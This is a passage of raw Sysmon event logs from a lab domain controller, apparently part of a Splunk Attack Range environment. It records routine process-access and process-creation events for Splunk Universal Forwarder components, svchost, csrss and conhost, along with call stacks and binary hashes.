Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006318Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.718{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE7-5FA1-5B01-000000008801}5040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006317Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.718{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006316Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.718{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006315Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.718{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006314Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.718{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006313Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.718{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006312Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.718{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006311Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.718{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006310Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.718{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006309Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.718{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006308Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.718{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CE7-5FA1-5B01-000000008801}5040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006307Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.718{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE7-5FA1-5B01-000000008801}5040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006306Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.719{D28789B6-7CE7-5FA1-5B01-000000008801}5040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006305Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.045{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE7-5FA1-5A01-000000008801}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006304Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.045{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006303Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.045{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006302Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.045{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006301Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.045{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006300Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.045{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006299Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.045{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006298Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.045{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006297Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.045{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006296Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.045{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006295Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.045{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CE7-5FA1-5A01-000000008801}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006294Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.045{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE7-5FA1-5A01-000000008801}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006293Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.046{D28789B6-7CE7-5FA1-5A01-000000008801}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 